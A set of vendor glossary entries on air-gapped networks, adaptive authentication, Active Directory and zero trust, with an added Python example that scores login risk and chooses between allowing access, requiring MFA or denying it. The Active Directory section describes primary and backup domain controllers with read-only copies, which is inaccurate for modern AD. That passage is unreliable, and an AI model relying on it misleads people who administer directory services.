- Streamlined Operations: While PAM primarily focuses on security, it can also have positive effects on operational efficiency. By implementing PAM solutions, organizations can streamline operations by automating and centralizing privileged account management processes. This includes features like password management, access request workflows, and session recording. These streamlined processes reduce manual overhead, enhance productivity, and improve operational efficiency for IT teams. Additionally, PAM solutions provide self-service capabilities, enabling authorized users to request and obtain temporary privileged access when needed, reducing administrative burdens.
### The Drawbacks of PAM

PAM solutions are based on placing additional protection on your privileged...

---
- Published: 2023-01-18
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/an-air-gapped-network/

A highly secure, physically isolated network with no external connectivity, used to safeguard highly sensitive systems in sectors like defense and critical infrastructure.

Air-gapped networks are internal networks completely isolated from the cloud or other external networks. In most cases, this is due to physical security concerns or a strong need for data confidentiality. Some common examples of air-gapped networks include various national security actors such as defense, governments, and military bodies, as well as critical infrastructure entities that provide energy, water utilities, and other enabling services.

An air-gapped network represents the pinnacle of cybersecurity. In order to protect themselves against cyber threats, these networks are physically isolated from external connections. The concept of an air-gapped network involves keeping sensitive systems or data completely disconnected from the internet or any other network, ensuring an unparalleled level of protection.

### Importance of air-gapped networks in cybersecurity

The importance of air-gapped networks in cybersecurity cannot be overstated. They serve as a last line of defense against sophisticated attacks, preventing unauthorized access, data exfiltration, and remote exploitation of critical assets. By eliminating connectivity, air-gapped networks reduce the attack surface, making it extremely difficult for malicious actors to penetrate the system. Many industries utilize air-gapped networks to secure their data and resources, including sectors such as government, defense, finance, healthcare, and critical infrastructure, safeguarding classified data, intellectual property, and sensitive operations.
This provides an additional layer of protection to highly valuable assets whose compromise could have serious consequences.

### What is an Air-Gap?

An air-gap is a complete separation between a network or computer and any external connections, including the public internet. As a result of this isolation, assets are protected from malicious cyber activities. Air-gapped networks originated from the realization that no matter how robust an online security system might be, there will always be security gaps that can be exploited. By physically isolating critical systems, air-gapping provides an additional layer of defense against potential attacks.

The concept of air-gapping dates back to the earliest days of computing, when systems were standalone and not interconnected. In recent years, however, it has gained prominence as a security measure due to the rise of cyber threats and the realization that no online security system can provide total protection. As a result of the need to protect sensitive information and critical infrastructure from increasingly sophisticated attacks, air-gapped computers and networks have been widely adopted.

### Key principles behind air-gapped networks

#### Physical isolation

Air-gapped networks are based on the principle of physical isolation. In order to minimize the risk of unauthorized access, critical systems should be physically separated from external networks. A number of methods can be used to achieve this isolation, including physical separation, secure facilities, and limiting physical access to the systems.

#### Restricted connectivity

Air-gapped networks impose strict security controls on network connectivity to minimize the number of potential attack vectors. These controls limit the number of entry points and restrict network access to only authorized individuals or systems. By reducing the amount of connectivity, the attack surface is significantly reduced, making it harder for malicious actors to compromise the network.
#### Unidirectional data flow

The principle of unidirectional data flow is a critical component of air-gapped networks. Under this principle, data can only flow in one direction, typically from a trusted network to the air-gapped system. By doing so, data exfiltration or unauthorized communication from the isolated network is prevented. Techniques such as data diodes, which allow data to flow in one direction only, are commonly employed to enforce unidirectional data transfer.

### Who uses air-gapped networks?

Air-gapped networks are typically utilized by various organizations and industries that prioritize the security and protection of their sensitive information. Here are some examples of entities that commonly use air-gapped networks:

- Government and Defense Agencies: Government agencies, intelligence organizations, and military institutions often rely on air-gapped networks to safeguard classified information, state secrets, and sensitive defense systems. These networks ensure that critical data remains isolated and inaccessible to unauthorized individuals or foreign adversaries.
- Financial Institutions: Banks, financial organizations, and stock exchanges employ air-gapped networks to protect sensitive financial data, transactional systems, and customer information. These networks prevent unauthorized access, data breaches, and fraudulent activities, maintaining the integrity and confidentiality of financial computer systems.
- Healthcare Industry: Hospitals, medical research facilities, and healthcare organizations utilize air-gapped networks to secure medical equipment, patient records, medical research data, and other sensitive healthcare information. These networks ensure compliance with privacy regulations such as the Health Insurance Portability and Accountability Act (HIPAA) and protect against unauthorized access to or tampering with sensitive medical data.
- Energy and Utility Sector: Critical infrastructure, including power plants, water treatment facilities, nuclear power plants, and transportation systems, often relies on air-gapped networks to secure industrial control systems and operational data. By keeping these networks physically isolated, potential threats are mitigated, preventing unauthorized access and potential disruptions to essential services.
- Research and Development Institutions: Organizations involved in advanced research and development, such as aerospace, defense contractors, and scientific institutions, utilize air-gapped networks to protect intellectual property, confidential research data, and proprietary information. These networks prevent industrial espionage and safeguard valuable innovations.
- Legal and Law Enforcement Agencies: Legal firms, law enforcement agencies, and court systems employ air-gapped networks to protect sensitive case files, confidential client information, and classified legal documents. By isolating these networks, unauthorized access to and tampering with crucial legal data are mitigated.
- High-Security Facilities: Highly secure environments such as data centers, server farms, and top-secret research facilities utilize air-gapped networks to create robust security perimeters. These networks ensure that critical infrastructure, data repositories, and communication systems remain impervious to external threats.

### What are the advantages of air-gapped networks?

Air-gapped networks offer several advantages that make them an attractive security measure for organizations, such as:

- Enhanced Security: The primary advantage of air-gapped networks is their superior security. By physically isolating critical systems and data from external networks, they provide an additional layer of security against cyber threats. With no direct or indirect connectivity, it becomes exceedingly difficult for attackers to breach the network or compromise sensitive information.
- Protection against Targeted Attacks: Air-gapped networks are especially effective in protecting against targeted attacks, where adversaries meticulously plan and execute sophisticated intrusion techniques. Since these networks are not directly accessible from the internet, they significantly reduce the attack surface and thwart attempts to exploit security gaps in network infrastructure or software.
- Safeguarding Sensitive Information: Air-gapped networks are crucial for safeguarding sensitive and confidential information. They are widely used in industries such as government, defense, finance, and healthcare, where the integrity and confidentiality of data are paramount. By keeping critical data physically isolated, air-gapped networks prevent unauthorized access and maintain the privacy of sensitive information.
- Limiting Spread of Malware: Air-gapped networks act as a barrier against the spread of malware and other malicious software. Without direct connectivity, it becomes challenging for malware to propagate from external sources to the isolated network. This helps prevent widespread infections and reduces the risk of data loss or system compromise from ransomware.
- Reducing Vulnerabilities: By removing external connectivity, air-gapped networks reduce the potential attack vectors and vulnerabilities that can be exploited by cybercriminals. Since there are no direct network interfaces, components, or software exposed to external threats, the risk of system compromise or unauthorized access is significantly diminished.
- Regulatory Compliance: Air-gapped networks often play a crucial role in meeting regulatory requirements for data protection, privacy, and cyber insurance. Industries such as finance and healthcare have stringent regulations in place, and utilizing air-gapped networks helps organizations comply with these standards and demonstrate their commitment to safeguarding sensitive information.
- Physical Security: Air-gapped networks rely on physical security measures to maintain the integrity of the network. This includes secure facilities, controlled access to equipment, and surveillance systems. By ensuring that only authorized personnel have physical access to the network, the risk of physical tampering or unauthorized modifications is minimized.

### What are the downsides of air-gapped networks?

While air-gapped networks offer robust security advantages, they also come with some downsides and challenges. It is therefore important for organizations to carefully evaluate the benefits and downsides of air-gapped networks in their specific context. Balancing security needs, operational requirements, and usability considerations is crucial in determining the most appropriate cybersecurity measures for the organization. In some cases, a hybrid approach combining air-gapped networks with other security measures may be considered to address specific challenges and strike a balance between security and functionality. Here are a few considerations:

- Operational Complexity: Implementing and managing an air-gapped network can be very complex and resource-intensive. It requires additional infrastructure, specialized hardware, and careful planning to ensure proper physical isolation and restricted connectivity. Organizations must allocate enough resources for network setup, maintenance, and ongoing monitoring.
- Limited Functionality: The very nature of air-gapped networks, with their lack of connectivity, can limit the functionality and convenience of certain operations. For example, transferring data between the air-gapped network and external systems may require manual processes, such as using removable media or physically connecting devices. This can slow down workflows and introduce additional steps that need to be carefully managed.
- Insider Threats: While air-gapped networks provide protection against external cyber threats, they are not immune to insider threats.
Authorized individuals with physical access to the network can still pose a risk. Malicious insiders or unintentional mistakes by employees can potentially compromise the security of the air-gapped network. Strict access controls, monitoring, and security awareness training are crucial to mitigate these risks.
- Malware Transmission: Air-gapped networks are not invulnerable to malware. Although direct internet connectivity is absent, malware can still be introduced through physical media, such as USB drives or external storage devices, which may be used for data transfer. Malicious software can propagate within the network if introduced through such means, requiring strict security protocols and comprehensive scanning measures to prevent infections.
- Usability Challenges: The physical isolation and restricted connectivity of air-gapped networks can present usability challenges. It may be cumbersome to access and update software, apply security patches, or implement system updates. Additionally, the lack of direct internet access may limit the ability to utilize cloud services, access online resources, or benefit from real-time threat intelligence.
- Maintenance and Updates: Air-gapped networks require careful maintenance and regular updates to ensure the continued security and functionality of the network. This includes applying security patches, updating software, and conducting periodic audits. Maintaining the integrity of the air-gapped environment and ensuring it remains secure can be resource-intensive and time-consuming.

### Can air-gapped networks be breached?

While air-gapped networks are designed to provide a high level of security and make it extremely challenging for external threats to breach the network, it is important to recognize that no security measure is entirely bulletproof.
While the physical isolation and restricted connectivity of air-gapped networks significantly reduce the risk of cyber attacks, there are still potential ways in which they can be breached:

- Lateral Movement: Once attackers have established an initial foothold in the air-gapped network, they can move laterally across the network using stolen credentials to expand their presence and increase the attack's impact. In 2017, the infamous NotPetya attack performed such lateral movement in both standard IT networks and air-gapped OT networks.
- Insider Threats: One of the primary concerns for air-gapped networks is the insider threat. Malicious insiders who have authorized physical access to the network may intentionally breach the security measures. They can introduce malware or compromise the network's integrity, potentially bypassing security protocols and exposing sensitive information.
- Social Engineering: Air-gapped networks are not immune to social engineering attacks. Attackers may attempt to manipulate authorized employees with physical access to the network, tricking them into compromising the security measures. For example, an attacker could pose as a trusted individual or exploit human vulnerabilities to gain unauthorized access to the network.
- Malware Introduction through Physical Media: While air-gapped networks are disconnected from external networks, they can still be vulnerable to malware introduced through physical media, such as USB drives or external storage devices. If such media is connected to the air-gapped network without proper scanning or security measures, malware can potentially infect the network.
- Side-Channel Attacks: Sophisticated attackers may employ side-channel attacks to gather information from air-gapped networks. These...
---
- Published: 2023-01-18
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/adaptive-authentication/

A dynamic security method that uses contextual signals like device, location, and user behavior to determine whether additional authentication is needed for access.

Adaptive authentication is a security mechanism that uses various factors to verify the identity of a user. It is an advanced form of authentication that goes beyond traditional methods such as passwords and PINs. Adaptive authentication takes into account contextual information such as location, device, behavior, and risk level to determine whether a user should be granted access or not.

One important aspect of adaptive authentication is its ability to adapt to changing circumstances. For example, if a user logs in from an unfamiliar location or device, the system may require additional verification steps before granting access. Similarly, if a user's behavior deviates from their usual patterns (such as logging in at unusual times), the system may flag this as suspicious and require further verification. This dynamic approach helps ensure that only authorized users are granted access while minimizing disruptions for legitimate users.

### Importance of Adaptive Authentication in Today's Digital Landscape

With cyber threats on the rise, traditional authentication methods such as passwords and security questions are no longer enough to protect sensitive information. This is where adaptive authentication comes in, providing an extra layer of security that can adapt to different situations and user behaviors. Adaptive authentication helps prevent unauthorized access to sensitive data. By analyzing various factors such as location, device type, and user behavior, adaptive authentication can determine whether a login attempt is legitimate or not.
This means that even if a hacker manages to obtain a user's password, they will still be unable to access the account without passing additional security measures. Adaptive authentication can also help improve the user experience by reducing the need for cumbersome security measures such as two-factor authentication for every login attempt. Instead, users can enjoy a seamless login process while still benefiting from enhanced security measures in the background.

### How Adaptive Authentication Works: Techniques and Methods

Adaptive authentication is a security measure that uses various techniques and methods to verify the identity of users. One of the most common techniques used in adaptive authentication is multi-factor authentication, which requires users to provide multiple forms of identification before accessing their accounts. This can include something they know (like a password), something they have (like a token or smart card), or something they are (like biometric data).

Another technique used in adaptive authentication is behavioral analysis, which looks at how users interact with their devices and applications to determine if their behavior is consistent with what would be expected from them. For example, if a user typically logs in from New York but suddenly attempts to log in from China, this could trigger an alert that prompts additional verification steps.

Risk-based authentication is another method used in adaptive authentication, which assesses the level of risk associated with each login attempt based on factors like location, device type, and time of day. If the risk level is deemed high, additional verification steps may be required before granting access.

### Types of Adaptive Authentication: Multi-Factor, Behavioral, and Risk-Based

There are three main types of adaptive authentication: multi-factor, behavioral, and risk-based.
Multi-factor authentication (MFA) is a type of adaptive authentication that requires users to provide multiple forms of identification before they can access a system or application. This could include something they know (like a password), something they have (like a token or smart card), or something they are (like biometric data). By requiring multiple factors, adaptive MFA makes it much more difficult for hackers to gain unauthorized access.

Behavioral authentication is another type of adaptive authentication that looks at how users interact with a system or application. By analyzing things like keystroke patterns, mouse movements, and other behaviors, this type of authentication can help detect when someone is trying to impersonate an authorized user. Behavioral authentication can be particularly useful in detecting fraud and preventing account takeover attacks.

Risk-based authentication takes into account various risk factors when determining whether to grant access to a system or application. These factors might include the location from which the user is accessing the system, the time of day, the device being used, and other contextual information. By analyzing these factors in real time, risk-based authentication can help prevent fraudulent activity while still allowing legitimate users to access what they need.

### Adaptive Authentication vs. Traditional Authentication: Pros and Cons

Adaptive authentication and traditional authentication are two different approaches to securing digital systems. Traditional authentication methods rely on static credentials such as usernames and passwords, while adaptive authentication uses dynamic factors such as user behavior and risk analysis to determine the level of access granted. One of the main advantages of adaptive authentication is that it can provide a higher level of security than traditional methods, as it takes into account contextual information that can help detect fraudulent activity.
However, there are also some drawbacks to using adaptive authentication. One potential issue is that it may be more complex to implement than traditional methods, requiring additional resources and expertise. Additionally, there is a risk that adaptive authentication could lead to false positives or negatives if the system is not properly calibrated or if users' behavior patterns change unexpectedly.

| | Adaptive Authentication | Traditional Authentication |
|---|---|---|
| Approach | Dynamic and context-aware | Static |
| Factors Considered | Multiple factors (e.g., device, location, behavior) | Fixed credentials (e.g., username, password) |
| Risk Assessment | Evaluates risk associated with each authentication attempt | No risk assessment, solely based on credentials |
| Authentication Level | Adjusts based on risk assessment | Fixed level of authentication for all users |
| Security | Enhanced security through risk analysis | Relies solely on credentials matching |
| User Experience | Improved user experience with reduced repeated authentication for low-risk activities | Same level of authentication for all activities |
| Flexibility | Adapts security measures based on the context of each authentication attempt | No adaptation, fixed security measures |

### Benefits of Adaptive Authentication

- Enhanced Security: Adaptive Authentication adds an extra layer of security by considering multiple factors and conducting risk assessments. It helps identify suspicious or high-risk activities, such as login attempts from unfamiliar devices or locations. By adapting security measures based on the perceived risk, it helps protect against unauthorized access and potential security breaches.
- Improved User Experience: Adaptive Authentication can improve the user experience by reducing the need for repeated authentication for low-risk activities. Users may only be prompted for additional verification when the system detects potentially risky behavior or transactions.
This streamlined approach reduces friction and enhances convenience for users while maintaining a high level of security.
- Context-Aware Protection: Adaptive Authentication takes into account contextual information, such as device information, location, IP address, and behavioral patterns. This allows it to identify anomalies and potential threats in real time. By analyzing the context of each authentication attempt, it can apply appropriate security measures and authentication levels to mitigate risks.
- Customizable Security Policies: Adaptive Authentication allows organizations to define and implement customizable security policies based on their specific needs and risk profile. It provides flexibility to adjust authentication requirements for different user roles, activities, or scenarios. This flexibility ensures that security measures align with the organization's risk management strategy while accommodating varying user needs.
- Compliance and Regulatory Alignment: Adaptive Authentication can help organizations meet compliance requirements and align with industry regulations. By implementing robust authentication mechanisms and risk-based assessments, organizations can demonstrate compliance with security standards and protect sensitive data from unauthorized access.
- Real-Time Threat Detection: Adaptive Authentication systems continuously monitor and analyze user behavior, system logs, and contextual information in real time. This enables quick detection of and response to potential threats or suspicious activities. Adaptive systems can trigger additional authentication steps, such as multi-factor authentication, for high-risk events, ensuring a proactive defense against cyberattacks.
- Cost-Effective Solution: Adaptive Authentication can potentially reduce costs associated with fraud and security breaches.
By dynamically adjusting security measures based on risk, it minimizes unnecessary authentication requests and allows organizations to allocate security resources more efficiently. Additionally, it helps prevent financial losses, reputation damage, and legal consequences resulting from security incidents.

These benefits make Adaptive Authentication an attractive choice for organizations aiming to balance security and user experience while effectively mitigating the risks associated with unauthorized access and fraudulent activities.

### How to Implement Adaptive Authentication

Implementing Adaptive Authentication involves several steps to ensure a successful deployment. Here is a general outline of the implementation process:

- Define Objectives: Start by clearly defining the objectives and goals of implementing Adaptive Authentication. Identify the specific problems or risks you aim to address, such as unauthorized access, fraud, or improving user experience. Determine the desired outcomes and benefits you expect from the implementation.
- Assess Risk Factors: Conduct a comprehensive risk assessment to identify the key risk factors that should be considered in the Adaptive Authentication process. This may include factors such as device information, location, IP address, user behavior, transaction patterns, and more. Evaluate the significance and impact of each factor on the overall risk assessment.
- Select Authentication Factors: Determine the authentication factors that will be utilized in the Adaptive Authentication process. These factors can include something the user knows (e.g., password, PIN), something the user has (e.g., mobile device, smart card), or something the user is (e.g., biometric data like fingerprint, facial recognition). Consider a combination of factors to increase security and flexibility.
- Choose Risk Assessment Algorithms: Select appropriate risk assessment algorithms or methods that can evaluate the risk associated with each authentication attempt. These algorithms analyze the contextual information and authentication factors to generate a risk score or level. Common methods include rule-based systems, machine learning algorithms, anomaly detection, and behavior analysis.
- Define Adaptive Policies: Create adaptive policies based on the risk assessment results. Define different levels of authentication requirements and security measures corresponding to various risk levels. Determine the specific actions to be taken for different risk scenarios, such as triggering multi-factor authentication, challenging suspicious activities, or denying access.
- Integrate with Existing Systems: Integrate the Adaptive Authentication solution with your existing authentication infrastructure. This may involve integrating with identity and access management (IAM) systems, user directories, authentication servers, or other relevant components. Ensure that the solution seamlessly integrates into your existing security architecture and workflows.
- Test and Validate: Conduct thorough testing and validation of the Adaptive Authentication system before deploying it in a production environment. Test different risk scenarios, assess the accuracy of risk assessments, and verify the effectiveness of adaptive policies. Consider conducting pilot tests with a subset of users to gather feedback and fine-tune the system.
- Monitor and Refine: Once the Adaptive Authentication system is implemented, continuously monitor its performance and effectiveness. Monitor user behavior, system logs, and risk assessment results to identify any anomalies or potential improvements. Regularly update and refine the risk assessment algorithms, adaptive policies, and authentication factors based on feedback and emerging threats.
- User Education and Communication: Educate your users about the new Adaptive Authentication process and its benefits. Provide clear instructions on how to use the system and what to expect during the authentication process. Communicate any changes in authentication requirements or security measures to ensure a smooth user experience and avoid confusion.
- Compliance and Regulatory Considerations: Ensure that the Adaptive Authentication implementation aligns with relevant compliance standards and regulations in your industry. Consider privacy regulations, data protection requirements, and any specific guidelines related to authentication and access control.

Remember that the implementation process may vary depending on the specific Adaptive Authentication solution you choose and the requirements of your organization. Consulting with security experts or vendors specializing in Adaptive Authentication can provide valuable guidance and assistance throughout the implementation process.

### Challenges of Implementing Adaptive Authentication

While adaptive authentication offers a more secure way of protecting sensitive data, implementing it can be challenging. One of the biggest challenges is ensuring that the system accurately identifies legitimate users while keeping out fraudsters. This requires collecting and analyzing large amounts of data, which can be time-consuming and resource-intensive. To overcome this challenge, organizations need to invest in advanced analytics tools that can quickly analyze user behavior patterns and identify anomalies. They also need to establish clear policies for handling suspicious activities and train their staff on how to respond appropriately. Additionally, they should regularly review their authentication processes to ensure they are up-to-date with the latest security standards.

Another challenge is balancing security with user experience. While...
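The rule-based risk scoring and adaptive policies described in "How Adaptive Authentication Works" and in the implementation steps above (assess risk factors, choose a risk assessment method, define adaptive policies), as an added example that is not Silverfort's code or any product's API. The signals, weights, thresholds, and the sample user profile are all constructed assumptions for illustration; a real deployment would calibrate them against its own data, as the "Test and Validate" and "Monitor and Refine" steps require.

```python
"""Adaptive authentication risk engine (added illustration, not vendor code).

Scores a login attempt from contextual signals (device, country, hour of
day, IP reputation, recent failures) and maps the score to an adaptive
policy decision: ALLOW, STEP_UP (require MFA) or DENY. Weights, thresholds
and the sample profile below are constructed assumptions.
"""
from dataclasses import dataclass


@dataclass
class UserProfile:
    """Baseline learned for one user (constructed for the example)."""
    known_devices: set
    usual_countries: set
    usual_hours: range        # local hours at which the user normally logs in
    recent_failures: int = 0  # failed attempts in the current window


@dataclass
class LoginContext:
    """Contextual signals captured for one authentication attempt."""
    user: str
    device_id: str
    country: str
    hour: int
    ip_is_anonymizer: bool = False  # e.g. a known anonymizing proxy exit
    privileged: bool = False        # access to an admin or sensitive resource


# Rule-based risk assessment (one of the methods the text lists).
# Each rule: (name, weight added to the score, predicate over profile/context).
# Weights are assumptions; in practice they are tuned during pilot testing.
RULES = [
    ("unknown_device",  30, lambda p, c: c.device_id not in p.known_devices),
    ("unusual_country", 35, lambda p, c: c.country not in p.usual_countries),
    ("unusual_hour",    15, lambda p, c: c.hour not in p.usual_hours),
    ("anonymizing_ip",  40, lambda p, c: c.ip_is_anonymizer),
    ("recent_failures", 20, lambda p, c: p.recent_failures >= 3),
]


def risk_score(profile, ctx):
    """Return (score, triggered_rule_names); the score is capped at 100."""
    triggered = [name for name, _, pred in RULES if pred(profile, ctx)]
    score = sum(w for name, w, _ in RULES if name in triggered)
    return min(score, 100), triggered


def decide(profile, ctx, allow_below=25, deny_from=70):
    """Adaptive policy: ALLOW low risk, STEP_UP (MFA) medium risk, DENY high.

    Privileged access always requires step-up, regardless of score, which
    mirrors the per-role policy flexibility the text describes.
    Returns (decision, score, reasons) so the reasons can be logged.
    """
    score, reasons = risk_score(profile, ctx)
    if score >= deny_from:
        return "DENY", score, reasons
    if ctx.privileged or score >= allow_below:
        return "STEP_UP", score, reasons
    return "ALLOW", score, reasons


if __name__ == "__main__":
    # Constructed baseline: user normally works from one laptop, in the US,
    # between 07:00 and 19:00 local time.
    alice = UserProfile(known_devices={"laptop-1"}, usual_countries={"US"},
                        usual_hours=range(7, 20))
    attempts = [
        LoginContext("alice", "laptop-1", "US", 10),                          # routine
        LoginContext("alice", "phone-9", "US", 10),                           # new device
        LoginContext("alice", "laptop-1", "CN", 3),                           # the text's New York / China case
        LoginContext("alice", "laptop-1", "CN", 3, ip_is_anonymizer=True),    # plus anonymizing IP
        LoginContext("alice", "laptop-1", "US", 10, privileged=True),         # admin resource
    ]
    for ctx in attempts:
        decision, score, reasons = decide(alice, ctx)
        print(f"{ctx.user}@{ctx.device_id} from {ctx.country} at {ctx.hour:02d}h "
              f"-> {decision} (score {score}, reasons {reasons or 'none'})")
```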
---

- Published: 2023-01-18
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/active-directory/

Active Directory (AD) is Microsoft’s centralized directory service that organizes and manages user accounts, computers, groups, and other network resources, streamlining authentication, authorization, and administration in networked environments.

Active Directory (AD) is a directory service developed by Microsoft that provides a centralized location for managing and organizing resources in a networked environment. It serves as a repository for storing information about user accounts, computers, groups, and other network resources. Active Directory is designed to simplify network administration by providing a hierarchical structure and a set of services that enable administrators to manage user authentication, authorization, and access to resources efficiently.

### How does Active Directory work?

Active Directory works by organizing objects into a hierarchical structure called a domain. Domains can be grouped together to form trees, and multiple trees can be connected to create a forest. The domain controller acts as the central server that authenticates and authorizes users, maintains the directory database, and replicates data to other domain controllers within the same domain or across domains. Clients interact with the domain controller to request authentication and access to network resources.

Active Directory operates as the authentication infrastructure in practically every organizational network today. In the pre-cloud era, all organizational resources resided exclusively on-premises, making AD effectively the sole identity provider. However, even now that organizations seek to transition workloads and applications to the cloud, AD is still present in more than 95% of organizational networks. This is mainly because core resources are hard or impossible to migrate to the cloud.

### What are the 3 main functions of Active Directory?
- Authentication: Active Directory is used to authenticate users, computers, and other resources on a network. This means that AD verifies the identity of a user or device before allowing access to network resources.
- Authorization: Once a user or device has been authenticated, AD is used to authorize access to specific resources on the network. This is done by assigning permissions and rights to users and groups, which determine what they are allowed to do on the network.
- Directory Services: Active Directory is also a directory service, which means that it stores and organizes information about network resources, such as users, computers, and applications. This information can be used to manage and locate resources on the network.

### Relationship to Azure Active Directory

Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. While Active Directory is primarily used for on-premises network environments, Azure AD extends its capabilities to the cloud. Azure AD provides features such as single sign-on (SSO), multi-factor authentication (MFA), and user provisioning for cloud applications and services. It can also synchronize user accounts and passwords from an on-premises Active Directory to Azure AD, allowing organizations to manage user identities consistently across on-premises and cloud environments.

### Benefits of Active Directory

Active Directory offers several benefits for organizations:

- Centralized User Management: Active Directory provides a centralized location to manage user accounts, groups, and access to resources. This simplifies the administration of user identities and enhances security by enabling consistent access control policies.
- Single Sign-On (SSO): Active Directory supports SSO, allowing users to authenticate once and access multiple resources without needing to re-enter credentials. This improves user experience and reduces the need for remembering multiple passwords.
- Resource Management: Active Directory facilitates efficient management of network resources such as computers, printers, and file shares. It enables administrators to organize and secure resources based on user or group permissions, ensuring proper access control.
- Group Policy Management: Active Directory allows administrators to define and enforce security policies, configurations, and restrictions across the network using Group Policy Objects (GPOs). GPOs enable consistent application of security settings and help maintain compliance with organizational standards.

### Vulnerabilities in Active Directory

While Active Directory provides robust security features, it is not immune to vulnerabilities. Some common vulnerabilities include:

- Credential Attacks: Attackers may attempt to compromise user credentials through techniques like password cracking, phishing, or credential theft. Weak or easily guessable passwords can be exploited to gain unauthorized access to the Active Directory.
- Privilege Escalation: If an attacker gains access to a low-privileged account, they may try to escalate privileges within the Active Directory environment. This can lead to unauthorized access to sensitive resources or administrative privileges.
- Lateral Movement: Once inside the Active Directory, attackers may exploit weak access control or misconfigurations to move laterally within the network, escalating their access and potentially compromising additional resources.
- Active Directory Replication Vulnerabilities: The replication process in Active Directory may have vulnerabilities that attackers can exploit to manipulate or inject malicious data into the directory database, leading to unauthorized access or disruptions in the replication process.
- Active Directory cannot detect or prevent identity threats: AD cannot provide protection against these attacks, since its protection capabilities are limited to checking the match between username and credentials.
Since identity threats, by definition, are founded on compromising valid usernames and credentials, they can easily bypass AD and disguise their malicious authentication as a legitimate one. This creates a severe blind spot in organizations’ security architecture that gives rise to numerous variations of lateral movement attacks.

It is crucial for organizations to implement strong security measures, such as regular patching, robust password policies, multi-factor authentication, and monitoring, to mitigate these vulnerabilities and protect the integrity and security of their Active Directory environment.

### Active Directory Structure

#### Components of Active Directory

Active Directory is structured using three main components: domains, trees, and forests. A domain is a logical grouping of objects, such as user accounts, computers, and resources, within a network. Domains can be combined to form a tree, which represents a hierarchical structure where child domains are connected to a parent domain. Multiple trees can be linked together to create a forest, which is the highest level of organization in Active Directory. Forests enable the sharing of resources and trust relationships between domains within the same organization or across different organizations.

#### Hierarchical structure of Active Directory

Domains in Active Directory follow a hierarchical structure, with each domain having its own unique domain name. Domains can be further divided into organizational units (OUs), which are containers used for organizing and managing objects within a domain. OUs provide a way to delegate administrative tasks, apply group policies, and define access permissions at a more granular level. OUs can be nested within each other to create a hierarchy that aligns with the organization's structure, making it easier to manage and control access to resources.
#### Trust and how it enables secure communication between domains

Trust relationships in Active Directory establish secure communication and resource sharing between different domains. A trust is a relationship established between two domains that enables users in one domain to access resources in the other domain. Trusts can be transitive or non-transitive. Transitive trusts allow trust relationships to flow through multiple domains within a forest, while non-transitive trusts are limited to a direct relationship between two specific domains. Trusts enable users to authenticate and access resources across trusted domains, providing a cohesive and secure environment for collaboration and resource sharing within and between organizations.

### Active Directory Architecture and Components

#### Domain Controllers

Domain controllers are key components of Active Directory architecture. They serve as the central servers responsible for authenticating and authorizing user access, maintaining the directory database, and handling directory-related operations within a domain. In a domain, there is typically one primary domain controller (PDC) that holds the read-write copy of the directory database, while additional backup domain controllers (BDCs) maintain read-only copies. Domain controllers replicate and synchronize data using a process called replication, ensuring that changes made in one domain controller are propagated to others, thus maintaining a consistent directory database across the domain.

#### Global Catalog Servers

Global catalog servers play a vital role in Active Directory by providing a distributed and searchable catalog of objects across multiple domains within a forest. Unlike domain controllers that store information specific to their domain, global catalog servers store a partial replica of all domain objects in the forest. This enables faster searching and access to information without the need for referrals to other domains.
Global catalog servers are beneficial in scenarios where users need to search for objects across domains, such as finding email addresses or accessing resources in a multi-domain environment.

#### Active Directory Sites and Replication

Active Directory sites are logical groupings of network locations that represent physical locations within an organization, such as different offices or data centers. Sites help manage network traffic and optimize authentication and data replication within the Active Directory environment. Site links define the network connections between sites and are used to control the replication traffic flow. Site link bridges provide a way to connect multiple site links, allowing efficient replication between non-adjacent sites.

The replication process ensures data consistency by replicating changes made in one domain controller to other domain controllers within the same site or across different sites. This process helps maintain a synchronized and up-to-date directory database across the network, ensuring that changes are propagated reliably throughout the Active Directory infrastructure.

### Active Directory Services

#### Active Directory Domain Services (AD DS)

AD DS is the primary service within Active Directory that handles authentication and authorization. It verifies the identity of users and grants them access to network resources based on their permissions. AD DS authenticates users by validating their credentials, such as usernames and passwords, against the directory database. Authorization determines the level of access users have to resources based on their group memberships and security principals.

#### User accounts, groups, and security principals in AD DS

User accounts, groups, and security principals are fundamental components of AD DS. User accounts represent individual users and contain information such as usernames, passwords, and attributes like email addresses and phone numbers.
Groups are collections of user accounts that share similar permissions and access rights. They simplify access management by allowing administrators to assign permissions to groups rather than individual users. Security principals, identified by security identifiers (SIDs), uniquely identify and secure objects within AD DS, providing a foundation for access control and security.

#### Domain controllers and their roles in AD DS

Domain controllers are servers that host AD DS and play a vital role in its functioning. They store and replicate the directory database, handle authentication requests, and enforce security policies within their domain. Domain controllers maintain a synchronized copy of the directory database, ensuring consistency across multiple domain controllers. They also facilitate the replication of changes made in one domain controller to others within the same domain or across domains, supporting fault tolerance and redundancy within the AD DS environment.

#### Active Directory Federation Services (AD FS)

AD FS enables Single Sign-On (SSO) across different organizations and applications. It acts as a trusted intermediary, allowing users to authenticate once and access multiple resources without the need for separate logins. AD FS provides a secure and seamless authentication experience by leveraging standard protocols such as Security Assertion Markup Language (SAML) and OAuth. It eliminates the need for users to remember multiple credentials and simplifies the management of user access across organizational boundaries.

#### How AD FS establishes trust relationships between organizations

AD FS establishes trust relationships between organizations to enable secure communication and authentication. Trust is established through the exchange of digital certificates between the identity provider (IdP) and the relying party (RP). The IdP, typically the organization providing identity information, issues and verifies security tokens containing user claims.
The RP, the resource or service provider, trusts the IdP and accepts the security tokens as proof of user authentication. This trust relationship allows users from one organization to access resources in another organization, enabling collaboration and seamless access to shared services.

#### Active Directory Lightweight Directory Services (AD LDS)

AD LDS is a lightweight directory service provided by Active Directory. It serves as a directory solution for lightweight applications that require directory functionalities without the need for a full AD DS infrastructure. AD LDS offers a smaller footprint, simplified management, and a more flexible schema than AD DS. It is commonly used in scenarios such as web applications, extranets, and line-of-business applications that require directory services but do not necessitate the complexity of a complete Active Directory deployment.

Key features of Active Directory Lightweight Directory Services...

---

- Published: 2023-01-17
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-zero-trust/

A security model where no identity—whether of users, devices, or apps—is inherently trusted; instead, every access request is individually verified with strong identity validation and granular controls.

Zero Trust is a security framework designed to mitigate cyber risks by assuming that no user or device should be inherently trusted, regardless of their relationship to a network environment. Instead of relying on a static perimeter defense, Zero Trust seeks to evaluate each access attempt individually in order to protect valuable resources and data.

